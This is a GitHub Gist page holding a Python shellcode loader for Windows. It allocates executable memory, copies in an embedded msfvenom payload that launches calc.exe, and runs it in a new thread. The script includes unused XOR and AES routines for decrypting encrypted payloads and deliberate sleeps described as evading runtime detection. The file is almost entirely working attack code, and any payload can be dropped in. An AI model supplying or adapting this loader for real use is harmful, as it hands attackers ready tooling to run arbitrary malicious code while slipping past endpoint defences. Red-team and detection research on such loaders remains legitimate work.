Last active
October 20, 2023 23:51
-
-
Save m8sec/864c1feb9718e21df06e9bc5bb52f60f to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: @m8sec | |
# Description: Injects shellcode into the current process. | |
import sys | |
import ctypes | |
import hashlib | |
from time import sleep | |
import ctypes.wintypes as wt | |
from base64 import b64decode | |
from Crypto.Cipher import AES | |
from Crypto.Util.Padding import pad | |
######################################## | |
# Optional shellcode decryption methods. | |
# (Currently not in use) | |
######################################## | |
def DecryptXOR(data, key): | |
# python3 shellcrypt.py -e xor -f base64 calc.bin | |
data = bytearray(b64decode(data)) | |
l = len(key) | |
keyAsInt = [x for x in map(ord, key)] | |
return bytes(bytearray(((data[i] ^ keyAsInt[i % l]) for i in range(0,len(data))))) | |
def DecryptAES(data, key): | |
# python3 shellcrypt.py -e aes -f base64 calc.bin | |
data = bytearray(b64decode(data)) | |
key = bytearray(b64decode(key)) | |
iv = 16 * b'\x00' | |
cipher = AES.new(hashlib.sha256(key).digest(), AES.MODE_CBC, iv) | |
return cipher.decrypt(pad(data, AES.block_size)) | |
#msfvenom -p windows/x64/exec cmd=calc.exe -f py -o calc.bin | |
buf = b"" | |
buf += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" | |
buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" | |
buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" | |
buf += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" | |
buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" | |
buf += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" | |
buf += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" | |
buf += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" | |
buf += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" | |
buf += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" | |
buf += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" | |
buf += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" | |
buf += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" | |
buf += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" | |
buf += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" | |
buf += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" | |
buf += b"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41" | |
buf += b"\xba\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41" | |
buf += b"\xba\xa6\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06" | |
buf += b"\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a" | |
buf += b"\x00\x59\x41\x89\xda\xff\xd5\x63\x61\x6c\x63\x2e\x65" | |
buf += b"\x78\x65\x00" | |
try: | |
# Function definitions | |
kernel32 = ctypes.windll.kernel32 | |
kernel32.VirtualAlloc.argtypes = (wt.LPVOID, ctypes.c_size_t, wt.DWORD, wt.DWORD) | |
kernel32.VirtualAlloc.restype = wt.LPVOID | |
kernel32.CreateRemoteThread.argtypes = (wt.HANDLE, wt.LPVOID, ctypes.c_size_t, wt.LPVOID, wt.LPVOID, wt.DWORD, wt.LPVOID) | |
kernel32.CreateThread.restype = wt.HANDLE | |
kernel32.RtlMoveMemory.argtypes = (wt.LPVOID, wt.LPVOID, ctypes.c_size_t) | |
kernel32.RtlMoveMemory.restype = wt.LPVOID | |
kernel32.WaitForSingleObject.argtypes = (wt.HANDLE, wt.DWORD) | |
kernel32.WaitForSingleObject.restype = wt.DWORD | |
# Start Shellcode loader | |
print("[+] Starting shellcode loader:") | |
memAddr = kernel32.VirtualAlloc(None, len(buf), 0x3000, 0x40) | |
print('[*] Allocated memory space at: {:08X}'.format(memAddr)) | |
print('[*] Interval sleep to avoid runtime detection (1/2).') | |
sleep(5) | |
kernel32.RtlMoveMemory(memAddr, buf, len(buf)) | |
print('[*] Copied payload into memory.') | |
print('[*] Interval sleep to avoid runtime detection (2/2).') | |
sleep(5) | |
th = kernel32.CreateThread( | |
ctypes.c_int(0), | |
ctypes.c_int(0), | |
ctypes.c_void_p(memAddr), | |
ctypes.c_int(0), | |
ctypes.c_int(0), | |
ctypes.pointer(ctypes.c_int(0)) | |
) | |
print('[*] Created thread in current process.') | |
kernel32.WaitForSingleObject(th, -1) | |
except KeyboardInterrupt: | |
print("[!] Key detected, closing") | |
sys.exit(1) | |
except Exception as e: | |
print("[-] Error: {}".format(str(e))) | |
sys.exit(0) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment